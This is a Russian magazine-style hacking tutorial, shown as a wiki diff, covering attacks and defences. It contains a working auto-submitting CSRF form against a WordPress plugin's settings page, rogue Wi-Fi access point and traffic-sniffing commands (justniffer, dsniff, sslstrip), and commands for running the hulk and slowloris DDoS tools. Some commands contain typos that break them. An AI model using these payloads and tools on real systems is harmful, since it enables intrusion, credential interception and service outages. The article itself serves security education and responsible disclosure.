LXF170:Взлом сети
Olkol (обсуждение | вклад) (→Защитите себя) |
Olkol (обсуждение | вклад) (→Защитите себя) |
||
(не показаны 2 промежуточные версии 1 участника) | |||
Строка 42: | Строка 42: | ||
===Защитите себя=== | ===Защитите себя=== | ||
− | {{Врезка|right|Ширина=40%|Заголовок=Уровни защиты |Содержание= | + | |
− | Абсолютной безопасности в мире нет – это справедливо и для реального, и для цифрового мира. Информация из данной статьи лишь дает вам относительно большую степень защиты. Безопасность – всегда баланс между удобством и уязвимостью, и выбор, какая из этих конкурирующих сторон важнее – личное дело каждого. Здесь лишь в общих чертах затронуты аспекты сетевой безопасности, которая является крайне сложной темой и только частью компьютерной безопасности. Если вы считаете, что рискуете подвергнуться направленной атаке, настоятельно рекомендуем обратиться к специалистам по безопасности и тестированию рисков вторжения. Они помогут укрепить вашу защиту, оградив вас от злоумышленников. }} | + | Если вы работаете в web-приложении, вы просто обязаны осознавать все риски. Уязвимости могут зайти дальше самого приложения, поскольку атакующему, возможно, удастся захватить контроль над сервером. Если вы используете готовое ПО (типа WordPress), неплохо запомнить такое правило: {{Врезка|right|Ширина=40%|Заголовок=Уровни защиты |Содержание= |
− | + | Абсолютной безопасности в мире нет – это справедливо и для реального, и для цифрового мира. Информация из данной статьи лишь дает вам относительно большую степень защиты. Безопасность – всегда баланс между удобством и уязвимостью, и выбор, какая из этих конкурирующих сторон важнее – личное дело каждого. Здесь лишь в общих чертах затронуты аспекты сетевой безопасности, которая является крайне сложной темой и только частью компьютерной безопасности. Если вы считаете, что рискуете подвергнуться направленной атаке, настоятельно рекомендуем обратиться к специалистам по безопасности и тестированию рисков вторжения. Они помогут укрепить вашу защиту, оградив вас от злоумышленников. }}чем проще и стандартнее ПО, тем легче быть в курсе дел и постоянно поддерживать обновления. Всегда проверяйте, чтобы у вас была самая последняя версия всех программ. | |
Intrusion Detection Systems [Система Обнаружения Вторжения] и Intrusion Prevention Systems [Системы Предотвращения Вторжения] (IDSs и IPSs) помогают снизить ущерб, причиняемый атакующим, однако не стоит считать их этакими серебряными пулями, способными разрешить все ваши проблемы с безопасностью. И не менее важно, чтобы у вас были установлены и должным образом настроены SELinux или AppArmour. | Intrusion Detection Systems [Система Обнаружения Вторжения] и Intrusion Prevention Systems [Системы Предотвращения Вторжения] (IDSs и IPSs) помогают снизить ущерб, причиняемый атакующим, однако не стоит считать их этакими серебряными пулями, способными разрешить все ваши проблемы с безопасностью. И не менее важно, чтобы у вас были установлены и должным образом настроены SELinux или AppArmour. | ||
Если вы используете специализированное web-приложение, вы должны быть уверены, что вам знакомы разные технологии, используемые атакующими. Отличный стартовый пункт – сайт OWASP (Open Source Web Applications Security Project – Проект безопасности web-приложений с открытым кодом), https://www.owasp.org. Если на вашем сайте хранятся важные данные, стоит посоветоваться со специалистом по поводу обеспечения безопасности их хранения. | Если вы используете специализированное web-приложение, вы должны быть уверены, что вам знакомы разные технологии, используемые атакующими. Отличный стартовый пункт – сайт OWASP (Open Source Web Applications Security Project – Проект безопасности web-приложений с открытым кодом), https://www.owasp.org. Если на вашем сайте хранятся важные данные, стоит посоветоваться со специалистом по поводу обеспечения безопасности их хранения. | ||
+ | {{Врезка|left|Ширина=98%|Заголовок= Шаг за шагом: Настраиваем среду|Содержание='''1 Импорт ВМ>''' | ||
+ | |||
+ | Щелкните (м. б. дважды) по Linux Format Vulnerable Machine.ova, затем щелкните по Import в диалоговом окне. | ||
+ | |||
+ | '''2 Запуск ВМ>''' | ||
+ | |||
+ | Дважды щелкните по новой машине, чтобы запустить ее. После загрузки она выдаст голубой экран с разными URL. | ||
+ | |||
+ | '''3 Просмотр сайта''' | ||
+ | |||
+ | Запустите web-браузер (должен работать любой) и укажите ему верхний URL из предыдущего шага. }} | ||
+ | |||
+ | ===Поиск уязвимостей=== | ||
+ | |||
+ | ''Как обнаружить и использовать слабую сторону вашего сайта.'' | ||
+ | |||
+ | Взглянув на ВМ LXF Vulnerable Machine, вы можете легко прийти к выводу, что использовать уязвимости очень легко, зная, где они есть, а вот как их найти? Чтобы ответить на этот вопрос, мы поставили себе задачу найти и использовать уязвимости на нашем сайте. | ||
+ | |||
+ | Во-первых, мы установили атакующий прокси. Этот инструмент перехватывает HTTP-запросы вашего браузера и использует их для создания карты сайта, который вы просматриваете. С его помощью вы можете понять, что же именно вы атакуете, даже если у вас нет доступа к исходному коду. Также он дает вам представление об информации, передаваемой между сервером и браузером. | ||
+ | |||
+ | Мы выбрали OWASP ZAP (он имеется на http://code.google.com/p/zaproxy и на DVD) – чтобы применить его, просто распакуйте его и запустите (устанавливать не надо) с помощью: | ||
+ | |||
+ | tar zxvf ZAP_2.0.0_Linux.tar.gz | ||
+ | |||
+ | cd ZAP_2.0.0 | ||
+ | |||
+ | ./zap.sh | ||
+ | |||
+ | Версии 2.0.0 требуется Java 1.7 или выше. Если у вас более ранняя версия (как по умолчанию в Ubuntu 12.04), вы можете использовать или ZAP версии 1.4.1, или самостоятельно найти версию Java поновее. На нашей машине с Precise Pangolin мы установили пакет openjdk-7-jre и изменили конечную строку с zap.sh на | ||
+ | |||
+ | exec /usr/lib/jvm/java-7-openjdk-i386/bin/java ${JMEM}-XX:PermSize=256M -jar “{BASEDIR}/zap.jar” org.zaproxy.zap.ZAP $* | ||
+ | |||
+ | Эта команда запустит работу прокси на порте 8080, и вам нужно настроить свой браузер, чтобы он пропускал свои данные через него. В Firefox это делается в Edit > Preferences, затем надо перейти в Advanced > Network > Settings и изменить переключатель на Manual Proxy Configuration с HTTP Proxy в качестве localhost и Port 8080. | ||
+ | |||
+ | Теперь вы должны увидеть одну или несколько записей Zap для каждой страницы, на которую вы заходите. Zap также попытается помочь вам, отмечая все пункты, которые он сочтет уязвимыми, цветным флажком – от желтого до красного, в зависимости от серьезности проблемы (по его мнению). Флажки голубого цвета просто отмечают информацию. Однако эту градацию надо принимать не без скепсиса. Многие из отмеченных флажками страниц вовсе не являются уязвимыми, а многие, наоборот, пропускаются (это обычная проблема со всеми автоматическими сканерами безопасности, которые мы встречали). | ||
+ | |||
+ | Настроив программу, мы можем начать атаку. Первая фаза любого теста на проникновение – это сбор информации. В ZAP есть инструменты для автоматического сканирования сайта, но мы предпочитаем начать с ручного сканирования. Это означает просмотр сайта через ваш web-браузер, в процессе которого ZAP составляет каталог. Чем подробнее вы рассматриваете сайт, тем больше информации вы получите. | ||
+ | |||
+ | Продвигаясь по приложению, мы ищем векторы атаки. В основном это способ передачи информации на сайт. В HTTP это происходит в двух видах: параметры, передаваемые по запросам GET (это биты, которые следуют за вопросительным знаком в URL), и запросы POST (их труднее увидеть без такого прокси, как ZAP, но они перечислены во вкладке Requests). Любые их них можно изменить так, чтобы они отправляли любую нужную нам информацию. Как вы видите на примере атак на блог WordPress, хорошо продуманные и организованные вредоносные данные могут иногда проскользнуть на сайт, если он не проверяет входящие данные должным образом. | ||
+ | |||
+ | Получив полное представление о своей жертве, можно приступать к поиску места для нашей атаки. Даже на таком простом сайте WordPress, как наш, есть сотни векторов, которые мы можем рассмотреть, но большинство не будут уязвимы. Частью искусства взлома сайтов является осознание того, на каких векторах стоит сконцентрироваться. Например, можно бы попробовать атаковать параметр page_id, имеющийся на большинстве страниц, но на WordPress он настолько важен, что явно подвергался тщательнейшему рассмотрению. Может, он и уязвим, но скорее всего сладить с ним не так-то просто. Лучше поискать слабости в менее используемых областях. Исторически сложилось, что дополнения всегда были куда более плодотворной почвой для атакующего, чем основное приложение. | ||
+ | |||
+ | ===Подделка межсайтовых запросов=== | ||
+ | |||
+ | Мы обратили внимание, что ZAP перечислил ряд страниц, уязвимых для подделки межсайтовых запросов (Cross Site Request Forgery, CSRF), во вкладке Alerts. Это способ атаки, при котором вы обманным путем заставляете web-приложение принять входящие данные, создавая другой сайт, который имитирует HTTP-запрос web-приложения. Если после этого аутентифицированный пользователь откроет ваш вредоносный сайт, его браузер отправит его аутентификационные cookie, благодаря которым ваш вредоносный запрос HTTP будет выполнен пользователем (не переживайте, если это все показалось вам темным: все станет ясно по мере того, как мы будем разбирать суть атаки). | ||
+ | |||
+ | Обычно WordPress останавливает этот вид атаки с помощью “nonce”. Это случайным образом выбранное число, направляемое в браузер при создании формы. Если с данными формы назад на сервер передается то же число, сервер знает, что форма представлена пользователем на сайте. Если нет – сервер понимает, что форма представлена другим сайтом, и просто сбрасывает данные. Однако мы заметили, что на одной из страниц нет nonce – в простом запросе HTTP POST, разрешенном с помощью cookie. А значит, любая форма HTML (независимо от того, на каком сайте она была) может представить данные этой части приложения. Выглядело идеальной целью для CSRF-атаки. Обсуждаемая страница была настройками для Ungallery (запрос см. на рис. 1). | ||
+ | |||
+ | Хитрость теперь заключалась в создании новой страницы, которая бы генерировала идентичный запрос HTTP. Это был запрос POST, и именно его проще всего подделать с помощью формы HTML. Мы создали новый файл, содержащий следующее: | ||
+ | |||
+ | <html> | ||
+ | |||
+ | <head> | ||
+ | |||
+ | <title>Test site for csrf in Ungallery</title> | ||
+ | |||
+ | </head> | ||
+ | |||
+ | <body> | ||
+ | |||
+ | <form action=”http://site-url/wp-admin/options-general.php?page=ungallerysettings” method=”POST”> | ||
+ | |||
+ | <input type=”hidden” name=”mt_submit_hidden” value=”Y”> | ||
+ | |||
+ | <input type=”hidden” name=”images_path” value=”%2Froot%2Fimages%2F”> | ||
+ | |||
+ | <input type=”hidden” name=”URI” value=”http%3A%2F%2F 192.168.133.143%2F”> | ||
+ | |||
+ | <input type=”hidden” name=”gallery” value=”%3Fpage_id%3D9”> | ||
+ | |||
+ | <input type=”hidden” name=”cache_dir” value=”%2Fvar%2F www%2Fwordpress%2Fwp-content%2Fcache%2F”> | ||
+ | |||
+ | <input type=”hidden” name=”columns” value=”5”> | ||
+ | |||
+ | <input type=”hidden” name=”thumbnail” value=”190”> | ||
+ | |||
+ | <input type=”hidden” name=”browse_view” value=”440”> | ||
+ | |||
+ | <input type=”hidden” name=”hidden” value=”hidden”> | ||
+ | |||
+ | <input type=”hidden” name=”gallery2” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”images2_path” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”gallery3” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”images3_path” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”gallery4” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”images4_path” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”gallery5” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”images5_path” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”gallery6” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”images6_path” value=””> | ||
+ | |||
+ | <input type=”hidden” name=”Submit” value=”Save+Changes”> | ||
+ | |||
+ | </form> | ||
+ | |||
+ | <script>document.forms[0].submit();</script> | ||
+ | |||
+ | </body> | ||
+ | |||
+ | </head> | ||
+ | |||
+ | Как вы можете видеть, это новая форма HTML, которая представляет данные на страницу настроек Ungallery. Поскольку здесь нет nonce, Ungallery автоматически примет его, если будет иметь соответствующий cookie. Если некто с правами администратора откроет файл, он может изменить настройки. При настоящей атаке это можно сделать, отправив по электронной почте завлекательную ссылку администратору или оставив где-нибудь в общественном месте флэшку USB со скриптом autorun. Конечно, это не самая вредоносная атака, но ею можно воспользоваться, чтобы сделать открытыми изображения, которые должны были хранится в секрете. | ||
+ | |||
+ | История на этом, конечно же, не заканчивается. Мы в Linux Format придерживаемся политики ответственного разглашения. Это означает, что хотя мы и рады публиковать подробную информацию об уязвимостях, все же сначала мы обязательно извещаем разработчика. | ||
+ | |||
+ | Как видите, процесс обнаружения уязвимостей требует знания того, что именно искать, и нахождения приложений для этого. Это может быть долгий и медленный процесс. Есть автоматические сканеры (вроде того, что включен в ZAP), но все же намного лучше делать это вручную – так виднее, что происходит. Многие тестировщики на проникновение предпочитают ручную работу, это позволяет им добиваться куда лучших результатов, чем автоматическим сканерам. | ||
+ | |||
+ | ===Посредник=== | ||
+ | |||
+ | ''Как подвергнуть атаке отдельный web-браузер.'' | ||
+ | |||
+ | Пока мы рассмотрели только атаку на сайт, но это лишь половина истории. Мы можем также подвергнуть атаке человека, который находится в сети. Одним из способов сделать это является XSS (например, тот, что возможен в ВМ WordPress), но мы сейчас сконцентрируемся на хищении данных. | ||
+ | |||
+ | Для этого есть несколько способов. Например, можно установить на компьютер вредоносное ПО и использовать его для перехвата сетевого трафика. Однако в нашей статье мы воспользуемся простейшим способом: разместим вредоносный компьютер между жертвой и Интернетом, чтобы весь трафик шел через него. Это называется атакой типа «Посредник» (Man In The Middle, MITM). Можете совершить ее с помощью сетевых кабелей, можете даже виртуально совершить ее с помощью атаки ARP-spoofing; ну, а мы обратимся к Wi-Fi. | ||
+ | |||
+ | Как и все атаки, описанные в этой статье, злоупотребление данной атакой является незаконным в большинстве стран. Это не означает злоупотребление данными, это означает кражу данных как таковую. | ||
+ | |||
+ | Чтобы протестировать атаку, мы взяли нетбук, подключенный к Ethernet, для создания беспроводной точки доступа – люди пользуются такими для соединения с сетью в кафе, даже не задумываясь о безопасности. | ||
+ | |||
+ | Во-первых, нужна программа настройки точки доступа. Мы использовали hostapd. Она имеется в репозиториях некоторых дистрибутивов, и доступна на http://hostap.epitest.fi/hostapd/. Вам также понадобится DHCP-сервер – он позволит убедиться, что клиенты, соединенные с вашей точкой доступа, могут получить IP-адреса. Мы использовали dhcpd3 (из пакета dhcpd3-server в Ubuntu). | ||
+ | |||
+ | Обеим программам нужны файлы настройки. Файлы для примера вы найдете в tar-архиве кода онлайн на www.linuxformat.com/archive. | ||
+ | |||
+ | Установив программу и найдя файл настройки, настройте свою точку доступа с помощью | ||
+ | |||
+ | sudo hostapd –Bdd hostapdl.conf | ||
+ | |||
+ | sudo dhcpd -4 –cf dhcp2.conf wlan0 | ||
+ | |||
+ | Возможно, придется добавить путь к двум файлам .conf, если их нет в текущей директории. | ||
+ | |||
+ | Вам нужно велеть своей машине перенаправить интернет- | ||
+ | соединения на другое сетевое соединение; в противном случае любая машина, которая соединяется с вами, не сможет получить доступ к Интернет. | ||
+ | |||
+ | sudo bash | ||
+ | |||
+ | echo “1” >/proc/sys/net/ipv4/ip_froward | ||
+ | |||
+ | iptables –t nat –A POSTROUTING –o eth0 –j MASQUERADE | ||
+ | |||
+ | Вероятно, самое удивительное в Интернете то, что большая часть информации не шифруется. Она просто отправляется как обычный текст, который может прочитать любой MITM без всяких проблем со взломом шифра. | ||
+ | |||
+ | Wireshark – отличный инструмент для просмотра данных, проходящих через ваш вредоносный компьютер на уровне пакетов, но большую часть времени нам не нужно углубляться до этого уровня. Вместо этого можно использовать justniffer для воссоздания всего сетевого трафика, проходящего через нашу вредоносную точку доступа. | ||
+ | |||
+ | Обычно этот инструмент не включается в репозитории дистрибутивов. Чтобы установить его в Ubuntu, добавьте PPA: | ||
+ | |||
+ | sudo add-apt-repository ppa:oreste-notelli/ppa | ||
+ | |||
+ | sudo apt-get update | ||
+ | |||
+ | sudo apr-get install justniffer | ||
+ | |||
+ | В других дистрибутивах придется компилировать его самостоятельно. Подробности см. на http://justniffer.sourceforge.net/#!/install | ||
+ | |||
+ | Есть ряд опций, позволяющих выполнять самые разные виды сетевого мониторинга. Мы собираемся использовать его способность воссоздавать web-страницы, которые он видит. Сначала создайте директорию данных. В данном примере она будет в домашней директории автора, но может находиться где угодно (неплохо разместить ее на отдельном диске, если вы планируете оставить ее работать на некоторое время). | ||
+ | |||
+ | mkdir /home/ben/data | ||
+ | |||
+ | sudo justniffer-grab-http-traffic -d /home/ben/data -U ben -i wlan0 | ||
+ | |||
+ | В обоих строках нужно заменить ben на свое имя пользователя. Опция -U командует, под каким пользователем сохранять файлы. | ||
+ | |||
+ | Если вы соединились с точкой доступа через компьютер, планшет или телефон и бродите по сети, вы должны видеть директорию данных, заполняемую файлами для каждой просмотренной незашифрованной страницы. Сюда входит содержание всех прочитанных писем, переданных без использования HTTPS (Gmail использует его, и поэтому письма с него не будут прочитаны; а большинство остальных сайтов– нет). | ||
+ | |||
+ | Конечно, не все, что вы хотите перехватить, проходит через HTTP, и многие другие популярные протоколы тоже не зашифрованы (например, FTP и Telnet). На ваше счастье, есть и инструменты, способные помочь вам атаковать их. Например, dsniff (http://monkey.org/~dugsong/dsniff) вытащит из сетевого трафика все незашифрованные пароли. | ||
+ | |||
+ | Оба эти инструмента пассивны, то есть просто делают копии данных, никак иначе на них не воздействуя. Мы можем несколько изменить ситуацию, но для этого придется прибегнуть к активной атаке, в частности, к sslstrip. | ||
+ | |||
+ | sslstrip использует саму суть сетевых ссылок и тот факт, что некоторые страницы зашифрованы, а некоторые – нет. В основном он отслеживает весь незашифрованный трафик и ждет ссылки или переадресации на сайты HTTPS, а затем начинает атаку MITM: sslstrip запрашивает безопасную версию сайта и выдает ее браузеру в виде простого HTTP. | ||
+ | |||
+ | Сайт может заблокировать подобную атаку, однако в цели нашей статьи не входит рассмотрение этого процесса. Однако мы обнаружили, что некоторые популярные сайты (включая Facebook и Yahoo) оказались уязвимы. Мы сообщили об этой проблеме командам безопасности этих сайтов. Facebook нам ответил, что они рекомендуют включить настройки безопасности браузера. Однако остановить атаку им не удастся, и когда мы сообщили об этом, нам ничего не ответили. А от Yahoo ответа вообще не поступило. | ||
+ | |||
+ | ===Шифруйтесь=== | ||
+ | |||
+ | Вы можете рассматривать Интернет как своего рода почтовый сервис. Обычно данные передаются незашифрованными, и это похоже на пересылку открытки. Прочитать ее может множество людей, с момента отправки и до момента доставки, и то же можно сказать и об информации, отправляемой через HTTP, FTP, Telnet. Иногда это не имеет значения – вам, вероятно, наплевать, если почтальон вашей бабушки узнает, что над всей Испанией безоблачное небо – но иногда и важно; и вы вряд ли захотите, чтобы почтальон узнал ваши банковские реквизиты. То же самое можно сказать и о данных онлайн. Если вы не хотите, чтобы ваши данные были доступны для широкой публики, используйте зашифрованный протокол (HTTPS, SFTP, SSH, SCP и т. п.). | ||
+ | |||
+ | Чтобы несколько упростить эту задачу, Electronic Frontier Foundation (EFF) создали расширение для Firefox (версия для Chrome находится на альфа-стадии разработки) под названием HTTPS Everywhere. Оно обеспечивает использование по умолчанию зашифрованной версии сайта, если таковая существует. Если у сайта нет зашифрованной версии, то оно будет работать с незашифрованной, так что бдительность терять все равно не советуем. | ||
+ | |||
+ | Как мы видели благодаря sslstrip, нужно быть крайне осторожным при использовании открытой сети, даже если сайт зашифрован. Прежде чем вводить какую-либо информацию, убедитесь, что вы используете HTTPS. | ||
+ | |||
+ | Зашифрованные протоколы сохраняют конфиденциальность данных, но они не скрывают, какие серверы вы используете. Например, злоумышленник может узнать, что вы используете gmail.com, но не сможет узнать, под каким именем пользователя вы работаете или какие сообщения по электронной почте получаете или отправляете. Если помимо шифрования вам нужна и анонимность, пользуйтесь VPN или Tor (https://www.torproject.org/). Помните, что для обеспечения должной защиты и в этом случае все равно надо использовать протокол с шифрованием. | ||
+ | |||
+ | > sstrtip сохраняет копию всего незашифрованного трафика. Обычная команда grep может найти любые данные идентификации (не радуйтесь: это не настоящие учетные записи). | ||
+ | |||
+ | {{Врезка|left|Ширина=98%|Заголовок= Взлом сертификатов |Содержание=Все виды шифрования основаны на использовании ключей. Это нечто вроде паролей, позволяющих расшифровать документ. Всегда нужно обеспечить обе стороны необходимыми ключами, чтобы расшифровать информацию. В сети используются сетификаты. Эти сертификаты создаются удостоверяющими центрами, и гарантируют, что получаемые данные (и используемые ключи) действительно переданы с заявленного сайта. Процесс сертификации сайтов открыт для нападения. Например, если вы можете загрузить в браузер сертификат собственного удостоверяющего центра, вы затем сможете создать собственные поддельные сертификаты, которым браузер будет доверять. Сделав это, вы затем сможете организовать атаку «Посредника», используя поддельный сертификат. | ||
+ | |||
+ | Чтобы помочь тестировщикам взлома с шифрованными сайтами, ZAP умеет создавать такие удостоверяющие центры и запускать атаки с их помощью. Есть также ряд коммерческих прокси, созданных, чтобы делать это широкомасштабно, чтобы (например) компании могли узнавать, чем их сотрудники занимаются онлайн. | ||
+ | |||
+ | Вывод такой: если кто-то еще контролирует ваш компьютер, он может следить за всем, что вы отправляете по сети, независимо от шифрования HTTPS. | ||
+ | }} | ||
+ | ===DDoS=== | ||
+ | |||
+ | ''Сокрушите намеченный сервер.'' | ||
+ | |||
+ | Distributed Denial of Service (DDoS), вероятно, самый разрекламированный вид атаки за последнее время. Anonimous и прочие хакерствующие коллективы прибегали к нему для атак на правительства, финансовые учреждения и прочие организации, которые в чем-то им насолили. Хоть это и не так рекламировалось, но DOS также стал оружием, которое использовали криминальные элементы. Однако прежде чем говорить о причинах этого, давайте рассмотрим, что такое DDoS-атаки и как они работают. | ||
+ | |||
+ | В общих чертах, DDoS-атака не позволяет серверу выполнять свои обычные функции, отказывая таким образом пользователям в обслуживании. Обычно это web-сервер, но необязательно. Это делается не посредством взлома компьютера или получения доступа, а перегрузкой сервера большим потоком запросов. | ||
+ | |||
+ | Например, атакующий может перегрузить сетевое соединение сервера фиктивными данными, и никакие полезные пакеты проскользнуть не смогут, или он может захватить все циклы CPU, и сервер не сможет обрабатывать другие запросы. | ||
+ | |||
+ | Поскольку большинство современных серверов имеют высокую пропускную способность, мощные CPU и большое количество памяти, как правило, их не очень-то перегрузишь только с помощью домашнего широкополосного соединения. Чтобы добиться этого, атакующие часто используют несколько компьютеров для одновременной атаки на цель. В случае хактивистов это делается группой сочувствующих; в случае преступных элементов, это часто делается ботнетами. | ||
+ | |||
+ | Есть множество инструментов, способных помочь вам провести тест на DDOS. Любимейший инструмент Anonimous – High Orbit Ion Cannon, поскольку он прост для неискушенных пользователей. Однако мы рассмотрим hulk. Его можно найти на http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html. Чтобы запустить hulk, просто распакуйте его и скомандуйте: | ||
+ | |||
+ | unzip hulk zip | ||
+ | |||
+ | python hulk py http://<site> | ||
+ | |||
+ | Чтобы протестировать его, можно скоренько настроить сервер HTTP с помощью | ||
+ | |||
+ | python -m SimpleHTTPServer | ||
+ | |||
+ | и затем атаковать его командой | ||
+ | |||
+ | python hulk.py http://<ip address>:8000 | ||
+ | |||
+ | Мы обнаружили, что это вполне эффективно обрушивает сайт. Но есть очевидная разница между обрушением небольшого web-сервера на Python и выбивание солидного сервера Apache в режим оффлайн. Hulk просто пытается закидать машину запросами. Теперь мы рассмотрим другой инструмент, более разумный. Slowlories (он есть на http://ha.ckers.org/slowloris/ или на DVD) работает, пытаясь удержать как можно больше соединений открытыми, с целью исчерпать ресурсы сервера. Это требует намного меньшей полосы вещания, чем атака грубой силы в стиле hulk, однако не все серверное ПО является уязвимым. Чтобы запустить slowlories, просто сделайте файл исполняемым и затем вызовите его с помощью: | ||
+ | |||
+ | chmode a+x slowlories.pl | ||
+ | |||
+ | ./slowris.pl -dns <site> | ||
+ | |||
+ | И снова наш сервер на Python сдался мгновенно. | ||
+ | |||
+ | ===Защищайтесь=== | ||
+ | |||
+ | Защита от DDoS-атаки заключается в минимизации ущерба от каждого вредоносного пакета. Другими словами, надо остановить как можно больше таких пакетов, как только они появятся в вашей сети. Для этого нужен брандмауэр и умение его настроить, чтобы он определял и отбрасывал соответствующие пакеты. | ||
+ | |||
+ | Как именно вы это сделаете, зависит от брандмауэра, и подходящие правила будут постоянно меняться в вечной охоте кошки за мышью, когда атакующий будет менять свои пакеты, чтобы обойти ваш брандмауэр. Однако мы скажем вот что: узнайте, как защитить себя, до того, как подвергнетесь атаке! Пробуйте всевозможные предлагаемые инструменты DDoS и практикуйтесь в искусстве их блокировать, потому что вряд ли вам понравится учиться этому после того, как ваш сайт рухнет. Работа с инструментами DDoS – также отличный способ узнать, как будет себя вести ваш сайт под пиковой нагрузкой. | ||
+ | |||
+ | В порядке альтернативы, можно поместить свой сервер в сеть, способную позаботиться о нем вместо вас. Такие провайдеры, как CloudFlare, поместят ваш сервер за свой брандмауэр (виртуально, вам не нужно заново соединяться с сервером). А значит, вам не придется беспокоиться о тонкостях настойки брандмауэра. | ||
+ | |||
+ | > Лори медленные [Slow lories] — тип приматов, обитающих в Южной и Юго-Восточной Азии. Если хотите узнать, как они выглядят, просто откройте файл Perl в текстовом редакторе. | ||
+ | |||
+ | <h1>«Ряд крупнейших из наблюдаемых атак – по сути, вымогательство онлайн»</h1> | ||
+ | |||
+ | <h2>Израильтяне и палестинцы согласны в одном: в выборе защитника от DDoS-атак. И вот мы встретились с Мэтью Принсом, руководителем и соучредителем CloudFlare, чтобы выяснить, как же он пытается опережать онлайн-злоумышленников.</h2> | ||
+ | |||
+ | '''Linux Format:''' Вы замечали, что география онлайн-атак со временем меняется? | ||
+ | [[Файл:LXF170.feat_hackleweb.m_fmt.png | right |thumb|300px| ]] | ||
+ | '''Мэтью Принс''' [Matthew Prince]: Мы с моим соучредителем начали работать над проблемами сетевой безопасности в 2003 году, запустив проект Honey Pot. Целью было отслеживать онлайновые мошенничества с кредитными картами, и в первую очередь мы отслеживали, как спамеры крадут адреса электронной почты с сайтов. В те времена лучшим способом для плохих парней сделать деньги онлайн было стать спамером или трудиться на ниве спама. Мне кажется, эта ситуация меняется. Эта сфера все еще весьма прибыльна, но уже не так, как раньше. В спаме есть одна интересная вещь: чтобы их не обнаружили, спамеры стали использовать ресурсы создателей вирусов [компьютеры, которые были частью ботнета] для своих рассылок. По мере того, как с годами улучшались фильтры спама и спам становился менее прибыльным, мы увидели, как те же самые ресурсы ботнета стали использоваться для ряда других атак. Таким образом, по сути мы сейчас имеем дело с той же проблемой, что и в 2003-м: имеются зараженные машины, и они используются, чтобы создать еще большие проблемы. В 2003-м это был спам, в 2012-м стал DDoS. Однако ресурсы, которыми онлайн-злоумышленники пользуются для запуска атаки, последние 10 лет остаются все теми же. | ||
+ | |||
+ | '''LXF''': В чем самая большая угроза для онлайн-бизнеса? | ||
+ | |||
+ | '''МП''': Мне кажется, очень сильно выросло как количество атак [DDoS], так и их размер. Мы наблюдаем регулярные атаки, превышающие 50 или 60 ГБ/с, которым подвергается наша сеть. У нас крупная и мощная сеть, и мы справляемся с атаками в несколько сотен ГБ, но, знаете ли, 50 или 60 гигов – это больше, чем могут отправить самые крупные хостинг-провайдеры. Я не знаю ни одного банка с подобным трафиком. С этим трудно справиться, потому что немного найдется ресурсов оборудования, которые можно было бы задействовать, чтобы прекратить такую атаку. Неважно, крупное у вас предприятие или мелкое, зарабатывающее онлайн, я полагаю, что масштаб и объем ныне наблюдаемых DDoS-атак внушает серьезные опасения для множества предприятий. | ||
+ | |||
+ | '''LXF''': Вы исследуете причины этих атак? | ||
+ | |||
+ | '''МП''': Мы не особо тратим время на выяснение причин и того, кто за этим стоит, хотя, конечно, получаем информацию от клиентов насчет того, что, по их мнению, послужило мотивом; и мотивы очень разные. Мы видели атаки по коммерческим соображениям. Бывают случаи, когда атака заказана конкурентом. Ряд крупнейших из наблюдаемых атак – по сути, вымогательство онлайн, когда некий злоумышленник отправляет электронной почтой на среднего (обычно) размера сайт e-commerce сообщение примерно такого содержания: «либо вы платите нам энную сумму, либо мы перекрываем вам доступ в Интернет». Количество подобных атак растет постоянно. | ||
+ | |||
+ | К нам обращался чеченский новостной сайт, атакованный российскими правительственными учреждениями или кем-то, сочувствующим российским правительственным учреждениям. У нас есть клиенты с обеих сторон ближневосточного конфликта. Нашими услугами пользуются израильские, палестинские и египетские сайты – на многие из них совершались масштабные атаки, и все с политической подоплекой. WikiLeaks также пользовалась [CloudFlare], для прекращения масштабных атак отказа в обслуживании. Хотя атаки хактивистов наиболее популярны в прессе, в основном они не самые крупномасштабные. Выясняется, что самые крупные атаки имеют определенную правительственную поддержку – вот те бывают действительно крупными. Или те, что являются онлайн-вымогательством. Мы видели атаки на сайты эскорт-услуг, когда ряд тружениц секса решил избавиться от сутенеров, а сутенеры стали их преследовать. В принципе, любой, у кого есть на вас зуб и ресурсы, чтобы доставить вам неприятности, может в наше время организовать довольно солидную атаку, способную вышибить оффлайн даже крупную организацию. Полную версию интервью см. на www.tuxradar.com/content/mpivew. | |
Текущая версия на 12:25, 15 ноября 2018
|
|
|
Содержание |
[править] ВЗЛОМ СЕТИ
Воровство паролей >>, Взлом WordPress >> Эксплуатация уязвимостей » Атаки DDoS.
Присоединимся к Бену Эверарду в его путешествии на темную сторону*.
Искусство манипулировать чужим компьютером, чтобы делать все что угодно без разрешения... одни называют его хакерством, другие — взломом или тестированием возможности проникновения в систему. Правительства, бизнесмены, диссиденты, скучающие компьютерные профессионалы и преступники атакуют друг друга — и обычных пользователей — ежедневно.
Хакерство бывает разное, но мы рассмотрим здесь сетевые атаки, поскольку именно они больше всего затрагивают обычных людей. Некоторые из этих атак, например, мстительные атаки группы Anonymous, становились широко известны, поскольку переводили сайты в режим оффлайн или добавляли граффити на главные страницы сайтов. О других сообщают очень редко, хотя они происходят что ни день, принося преступникам солидные суммы.
Если у вас есть сайт, вы, без сомнения, наблюдали множество попыток атаки по записям в своем журнале. Будучи пользователем, вы, скорее всего, наблюдали результаты этих атак в виде спама (помните эти завлекательные ссылки?); а может, вам сильно не повезло, и вы лишились некой личной информации, когда был атакован сервер.
В любом случае, мы все живем в тесно связанном мире, в котором все больше и больше наших ценностей хранятся в цифровых хранилищах, а не в физических сейфах. Остается или просто устроиться поудобнее и ждать, когда правительство и провайдеры нас защитят, или самим осознать все возможные угрозы и заняться самозащитой.
Мы покажем вам некоторые хакерские инструменты изнутри, потому что защитить себя можно, только разобравшись, от чего защищаешься.
Мы рассмотрим четыре разных типа атак – отказ в обслуживании (DDoS), «посредник [man-in-the-middle]», межсайтовый скриптинг и атаки внедрения – и покажем, как именно их используют преступники в наше время и что надо сделать, чтобы вы сами или ваш сайт не пали их жертвами.
[править] *Правовое обоснование
